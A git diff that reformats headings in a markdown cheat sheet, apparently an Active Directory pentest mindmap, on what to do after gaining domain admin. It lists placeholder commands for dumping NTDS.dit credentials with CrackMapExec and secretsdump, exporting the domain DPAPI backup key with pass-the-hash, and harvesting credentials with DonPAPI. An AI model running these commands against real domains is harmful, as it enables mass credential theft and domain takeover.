--- a/09. Domain admin.md
+++ b/09. Domain admin.md
@@ -1,7 +1,7 @@
-### Domain Admin
+# Domain Admin
 
 
-Domain admin
+## Domain admin
 	🔥dump ntds.dit
 		cme smb <dcip> -u <user> -p <password> -d <domain> --ntds
 		secretsdump.py '<domain>/<user>:<pass>'@<ip>
@@ -12,7 +12,9 @@ Domain admin
 			Lateral move
 			Crack Hash
 	dpapi.py backupkeys -hashes ':<hash>' -t Administrator@<dc_ip> --export  
-# note : dpapi.py != DonPAPI
+
+    # note : dpapi.py != DonPAPI
 		DonPAPI -pvk <domain_backupkey.pvk> - H ':<hash>' <domain>/<user>@<ip_range>
+
 	Credentials
 
